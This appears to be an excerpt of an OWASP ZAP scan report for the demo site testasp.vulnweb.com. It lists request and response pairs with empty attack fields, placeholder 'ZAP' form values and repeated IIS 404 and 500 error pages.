GET http://testasp.vulnweb.com/avatars/0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 404 Not Found
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 1245 |
| Response Body - size: 1,245 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/sitemap.xml |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 272 bytes. |
GET http://testasp.vulnweb.com/sitemap.xml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 404 Not Found
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 1245 |
| Response Body - size: 1,245 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 447 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 445 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 463 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 463 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 463 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
| Method | POST |
| Parameter | |
| Attack | |
